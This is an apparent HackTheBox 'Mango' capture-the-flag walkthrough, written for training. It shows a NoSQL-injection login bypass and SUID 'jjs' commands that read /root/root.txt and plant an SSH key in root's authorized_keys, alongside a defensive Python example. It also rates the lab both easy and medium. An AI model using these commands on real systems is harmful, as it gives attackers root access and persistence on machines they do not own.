Mango HackTheBox Walkthrough

Peppino1707

Today we’re going to solve another boot2root challenge called “Mango“. It’s available at HackTheBox for penetration testing practice. This laboratory is of an easy level, but adequate basic knowledge is enough to break these labs, and if we pay attention to all the details we find during the examination it will not be complicated. The credit for making this lab goes to MrR3boot. Let’s get started and learn how to break it down successfully.

Level: Medium

These labs are available on the HackTheBox website.

Penetration Testing Methodology

Reconnaissance

  • Nmap

Enumeration

  • Burp Suite
  • Lse.sh

Exploiting

  • NoSQL Injection with python script

Privilege Escalation

  • Abuse of SUID “jjs” binary

  • Capture the flag

Walkthrough

Reconnaissance

We run nmap against all ports with version detection and default scripts.

Code:
nmap -A -p- mango.htb

We see a web service on port 443; its SSL certificate reveals a subdomain, which we enumerate.

We add the subdomain to “/etc/hosts”:

Enumeration

We visit the main web resource and see that we do not have access.

We visit the subdomain we found and are met by an authentication panel that we must bypass.

We use Burp Suite to test different SQL injection payloads against the login form and find that the site is vulnerable to NoSQL injection.

We visit the website using the payload and see that we manage to bypass the authentication system.
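As an added example (not the lab’s or the author’s code), the pattern behind this kind of bypass modelled in Python: a login filter built straight from parsed form fields lets an operator object reach MongoDB, while the hardened version accepts only plain strings. The form parser mimics qs-style nested parsing and the request bodies are constructed samples.

```python
"""Added example: why a MongoDB login falls to operator injection and how to harden it.
Not the lab's own code. Assumes a web framework whose form parser turns
'field[$ne]=x' into {'field': {'$ne': 'x'}}, which is modelled by parse_form()."""
from typing import Any, Dict
from urllib.parse import parse_qsl


def parse_form(body: str) -> Dict[str, Any]:
    """Decode a urlencoded body into nested dicts the way qs-style parsers do."""
    params: Dict[str, Any] = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if "[" in key and key.endswith("]"):
            outer, inner = key[:-1].split("[", 1)
            params.setdefault(outer, {})[inner] = value
        else:
            params[key] = value
    return params


def vulnerable_filter(params: Dict[str, Any]) -> Dict[str, Any]:
    """Passes whatever structure the client sent straight into the query document."""
    return {"username": params.get("username"), "password": params.get("password")}


def hardened_filter(params: Dict[str, Any]) -> Dict[str, str]:
    """Accepts only plain strings, so a dict carrying $-operators never reaches the DB.
    (Real code would compare a password hash; the point here is type enforcement.)"""
    user, pw = params.get("username"), params.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        raise ValueError("login fields must be plain strings")
    return {"username": user, "password": pw}


def contains_operator(filter_doc: Dict[str, Any]) -> bool:
    """Detection helper: does any field value carry a MongoDB operator key ($ne, $regex, ...)?"""
    return any(
        isinstance(v, dict) and any(k.startswith("$") for k in v)
        for v in filter_doc.values()
    )


if __name__ == "__main__":
    # Constructed request bodies: one benign login and one operator-injection attempt.
    for body in ("username=admin&password=secret", "username[$ne]=x&password[$ne]=x"):
        p = parse_form(body)
        print(body, "->", "operator present" if contains_operator(vulnerable_filter(p)) else "clean")
```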

Exploiting

We use the following script and obtain two sets of credentials.
Remember that in the OSCP certification the use of SQLMap or NoSQLMap is not allowed.

Download: Script NoSQL.py

We use the credentials of the user “mango” to log in to the SSH service.

We cannot read the “user.txt” file as this user, so we authenticate as the “admin” user and read the “user.txt” flag.

Privilege Escalation (root)

With the lse.sh script we enumerate two uncommon SUID binaries; we will use “jjs” for privilege escalation.

If we want to keep it simple, we can read the root.txt file directly, but this is not valid in OSCP and it also loses the essence of a boot2root.

Code to read “root.txt”:

Code:
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
var line;
while ((line = br.readLine()) != null) { print(line); }
br.close();' | jjs

How can we escalate to root? There are several ways; I didn’t get complicated and I did it by adding my public key to the “authorized_keys” file of the root user.

Code:
echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw = new FileWriter("/root/.ssh/authorized_keys");
fw.write("ssh-rsa AAAAB3NzaC1yc2………\n");
fw.close();' | jjs

Once done, we read the “authorized_keys” file of the root user and confirm that our public key is there.

We connect to the SSH service as the root user using our RSA private key.

Author: David Utón is a penetration tester and security auditor for web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. He can be contacted on LinkedIn and Twitter.